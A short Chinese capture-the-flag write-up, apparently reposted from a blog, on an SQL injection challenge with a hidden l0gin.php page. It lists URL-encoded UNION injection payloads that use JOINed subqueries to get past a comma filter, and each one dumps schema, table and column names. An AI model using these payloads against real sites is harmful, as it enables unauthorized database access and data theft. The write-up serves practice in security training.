这个题有一点坑。。
首先发现源代码有提示login.php?id=1,结果尝试了半天也没能注入。
后来发现index.php存在,并且header中发现正真的登录页面l0gin.php....擂主还是有点坑。
- 这里看wp才看出来。什么东西哦。
- http://c5a28a553a614a0b8eac9ffd468aa62d036b91b17a5f48f4.changame.ichunqiu.com/l0gin.php?id=2%27%20%23
就是id=2' %23一测试就发现了注入点 - 用order by 测试发现是2
- 之后就是下面了
- 但是发现了逗号过滤
所以用select * from (select version())a join (select database())b 语句来绕过
/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(schema_name)%20from%20information_schema.schemata)b)%20%23
information_schema,sqli
/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3d'sqli')b)%20%23
users
/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3d'users')b)%20%23
>id,username,flag_9c861b688330</td id,username,flag_9c861b688330
转载于:https://www.jianshu.com/p/7a132d299109